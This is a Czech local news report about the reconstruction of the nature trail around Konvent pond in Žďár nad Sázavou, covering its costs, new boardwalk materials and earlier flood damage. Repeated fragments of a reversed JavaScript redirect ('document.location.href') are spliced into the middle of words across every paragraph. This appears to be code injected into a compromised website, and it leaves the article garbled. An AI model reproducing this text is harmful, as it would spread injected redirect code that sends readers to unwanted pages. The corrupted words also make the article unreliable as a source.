Rainbow page separator

Úpravy na rekonstruované stezce kolem rybníka finišují

Sobota, 13. listopadu 2021

Žďár nad Sázavou / Stále ještě probíhá generální rekonstrukce naučné stezky kolem rybníka Konvent, jež má být podle harmonogramu ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tová do konce [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to měsíce. Žďárští radní současně v říjnu schválili navýšení finanční režie na tu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to stavební akci podpořenou dotací, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to o necelých dvě stě tisíc korun bez DPH. Celkové náklady na dílo jsou vyčísleny na 6,7 milionu korun včetně DPH.
Revitalizace naučné stezky uvedené do provozu v roce 2011, jejíž značná část vede podmáčeným terénem po povalových chodnících, byla zahájena le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos na jaře. Původní dřevěné prvky byly demon[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továny a nahrazeny novými, v některých místech došlo i na obnovu základů bezbariérové stezky. Mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to původního smrku byla na chodníčky použita dubová a modřínové prkna, která vykazují větší odolnost vůči povětrnostním vlivům, což mají podpořit i odlišné technické detaily při jejich pokládce. Trasa dlouhá 2,6 kilometru byla v posledních letech ve špatném stavu, na čemž se podepsal i náročný podmáčený terén. Loni v létě ji navíc poškodil přívalový déšť, který narušil její statiku, takže měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to pěší trasu nechalo oficiálně uzavřít z důvodu ohrožení bezpečnosti chodců.